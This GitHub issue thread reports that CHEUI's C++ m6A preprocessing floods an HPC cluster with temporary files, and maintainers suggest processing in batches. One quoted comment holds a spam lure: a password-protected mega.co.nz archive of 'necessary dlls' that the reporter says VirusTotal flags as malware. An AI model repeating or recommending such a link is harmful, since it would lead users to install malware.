C++ preprocess (m6A) creates a large number of temporary files #43

olliecheng · 2024-09-29T03:05:06Z

Hi all,

Not sure if this is a duplicate of #38.

I've been trying to get CHEUI up and running but have been running into an issue with the preprocessing. Using the C++ preprocessing script (compiled on GCC v11.3, RHEL 9.4, commit 7b422f7808a3c2ffff56a9ead33a199824753b4e), I have been running it on a 858GB nanopolish eventalign file, generated from a ~2GB .fastq of reads.

In this instance, I noticed that the preprocessing script was producing an absurd amount of temporary files - over 7 million, before the HPC file quota ran out and the script was killed. (This was much to the chagrin of my university's HPC admin, and I promptly received a very strongly worded email advising me not to generate so many temporary files! 😅)

I've attached a small selection of ~1000 of these temporary files for debugging purposes, if it interests you. Each file seems to be very small - a few lines max, based off of my n = 10 sample size.

The aligned events file was called using:

nanopolish eventalign -t {threads} \
    --reads {input.reads} \
    --bam {input.bam} \
    --genome {REF} \
    --scale-events --signal-index --samples --print-read-names > {output}

and I was calling preprocess using:

# must first be in this path, or else the program crashes
cd $PATH_TO_CHEUI_PREPROCESS_DIR

./CHEUI -i $INPUT -m ../../kmer_models/model_kmer.csv -n {threads} --m6A -o $OUTPUT

See the attached sample of temporary files below: out_A_signals+IDs.zip

Let me know if there's anything else that you need.
Ollie

The text was updated successfully, but these errors were encountered:

olliecheng · 2024-09-29T03:11:04Z

maybe this will help

~~redacted mega.co.nz link~~

Password: changeme I put the necessary dlls in the archive

Sorry, I'm confused by this comment. I'm not sure how this is applicable, and I also don't want to run precompiled code with no source, especially on a shared HPC cluster. I'm also using RHEL v9.4 on the cluster, not Windows. Furthermore, VirusTotal flags x86_64-w64-ranlib.exe as malware. Are you affiliated with the Eyras computational RNA biology group?

EduEyras · 2024-09-29T13:34:24Z

Thanks Ollie for the email I cc Akanksha and Stefan from the lab who might be able to know how to circumvent this E.

…

On Sun, 29 Sept 2024 at 13:05, Oliver Cheng ***@***.***> wrote: Hi all, Not sure if this is a duplicate of #38 <#38>. I've been trying to get CHEUI up and running but have been running into an issue with the preprocessing. Using the C++ preprocessing script (compiled on GCC v11.3, RHEL 9.4, commit 7b422f7), I have been running it on a 858GB nanopolish eventalign file, generated from a ~2GB .fastq of reads. In this instance, I noticed that the preprocessing script was producing an absurd amount of temporary files - over 7 million, before the HPC file quota ran out and the script was killed. (This was much to the chagrin of my university's HPC admin, and I promptly received a very strongly worded email advising me not to generate so many temporary files! 😅) I've attached a small selection of ~1000 of these temporary files for debugging purposes, if it interests you. Each file seems to be very small - a few lines max, based off of my n = 10 sample size. The aligned events file was called using: nanopolish eventalign -t {threads} \ --reads {input.reads} \ --bam {input.bam} \ --genome {REF} \ --scale-events --signal-index --samples --print-read-names > {output} and I was calling preprocess using: # must first be in this path, or else the program crashescd $PATH_TO_CHEUI_PREPROCESS_DIR ./CHEUI -i $INPUT -m ../../kmer_models/model_kmer.csv -n {threads} --m6A -o $OUTPUT See the attached sample of temporary files below: out_A_signals+IDs.zip <https://github.com/user-attachments/files/17177384/out_A_signals%2BIDs.zip> Let me know if there's anything else that you need. Ollie — Reply to this email directly, view it on GitHub <#43>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ADCZKB2NXXLA3QVRF36ASMLZY5U7PAVCNFSM6AAAAABPBFXWZWVHI2DSMVQWIX3LMV43ASLTON2WKOZSGU2TINRXGU4TMNI> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

EduEyras · 2024-09-29T13:34:38Z

Sorry, I don't know where that comment was from. Please disregard that message E.

…

On Sun, 29 Sept 2024 at 13:11, Oliver Cheng ***@***.***> wrote: maybe this will help https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Password: changeme I put the necessary dlls in the archive Sorry, I'm confused by this comment. I'm not sure how this is applicable, and I also don't want to run precompiled code with no source, especially on a shared HPC cluster. I also run RHEL v9, not Windows. VirusTotal also flags x86_64-w64-ranlib.exe as malware. Are you affiliated with the Eyras computational RNA biology group? — Reply to this email directly, view it on GitHub <#43 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ADCZKB2NK6I7ZWSPFXGH7UDZY5VV5AVCNFSM6AAAAABPBFXWZWVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGOBRGA4DMMZZHA> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

EduEyras · 2024-09-30T00:49:17Z

Did you check the possible solution given by @pre-mRNA?:

_We apologise for the issue. CHEUI currently generates a large amount of intermediate files. You can process POD5 files sequentially to predict model 1, e.g.:

POD5 1 -> eventalign -> preprocess_m6a -> CHEUI model 1
You can then delete the eventalign and preprocess files, and keep only the model 1.

Before predicting model 2, you will need to merge and sort all the model 1 files.

Hope this helps._

olliecheng · 2024-09-30T01:10:50Z

Hi,

Thanks for your reply.

I have not tried it yet, as I am unsure about the quantity of intermediate files generated. I noticed that the solution above is for the Python preprocess script, while I am using the C++ script. I just wanted to first confirm that the small size of each temporary file (a few lines in size) is expected behaviour?

comprna deleted a comment Sep 29, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

C++ preprocess (m6A) creates a large number of temporary files #43

C++ preprocess (m6A) creates a large number of temporary files #43

olliecheng commented Sep 29, 2024

olliecheng commented Sep 29, 2024 •

edited

Loading

EduEyras commented Sep 29, 2024 via email

EduEyras commented Sep 29, 2024 via email

EduEyras commented Sep 30, 2024

olliecheng commented Sep 30, 2024 •

edited

Loading

C++ preprocess (m6A) creates a large number of temporary files #43

C++ preprocess (m6A) creates a large number of temporary files #43

Comments

olliecheng commented Sep 29, 2024

olliecheng commented Sep 29, 2024 • edited Loading

EduEyras commented Sep 29, 2024 via email

EduEyras commented Sep 29, 2024 via email

EduEyras commented Sep 30, 2024

olliecheng commented Sep 30, 2024 • edited Loading

olliecheng commented Sep 29, 2024 •

edited

Loading

olliecheng commented Sep 30, 2024 •

edited

Loading